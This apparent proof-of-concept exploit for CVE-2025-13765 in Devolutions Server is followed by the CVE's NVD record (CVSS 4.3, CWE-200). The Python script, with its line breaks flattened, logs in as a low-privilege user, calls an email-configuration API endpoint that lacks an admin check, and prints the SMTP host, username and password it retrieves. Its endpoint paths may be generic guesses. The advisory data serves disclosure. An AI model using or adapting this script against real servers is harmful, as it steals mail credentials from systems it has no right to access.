CVE-2025-13765

# CVE-2025-13765 PoC - Devolutions Server Email Credentials Exposure import requests import json target = "http://target-server:port" # Step 1: Authenticate with low-privilege user login_url = f"{target}/api/security/login" credentials = { "username": "lowpriv_user", "password": "user_password" } session = requests.Session() response = session.post(login_url, json=credentials) if response.status_code == 200: token = response.json().get('token') print(f"[+] Login successful, token: {token[:20]}...") # Step 2: Access email service configuration endpoint (requires admin but not enforced) email_config_url = f"{target}/api/email/configuration" headers = { "Authorization": f"Bearer {token}", "Content-Type": "application/json" } response = session.get(email_config_url, headers=headers) if response.status_code == 200: config = response.json() print(f"[!] Email credentials exposed:") print(f" SMTP Host: {config.get('smtp_host')}") print(f" SMTP Port: {config.get('smtp_port')}") print(f" Username: {config.get('username')}") print(f" Password: {config.get('password')}") print(f"[+] Full config: {json.dumps(config, indent=2)}") else: print(f"[-] Failed to retrieve email config: {response.status_code}") else: print(f"[-] Login failed: {response.status_code}")

{"cve": {"id": "CVE-2025-13765", "sourceIdentifier": "[email protected]", "published": "2025-11-27T16:15:47.387", "lastModified": "2025-12-03T14:47:18.103", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Exposure of email service credentials to users without administrative rights in Devolutions Server.This issue affects Devolutions Server: before 2025.2.21, before 2025.3.9."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:devolutions:devolutions_server:*:*:*:*:*:*:*:*", "versionEndExcluding": "2025.2.21.0", "matchCriteriaId": "FE34C172-0DA3-4FDB-A94B-DF84E36EBAD6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:devolutions:devolutions_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "2025.3.2.0", "versionEndExcluding": "2025.3.10.0", "matchCriteriaId": "A41D04CB-BDA3-4E90-8CBD-07E6E806F10C"}]}]}], "references": [{"url": "https://devolutions.net/security/advisories/DEVO-2025-0018/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}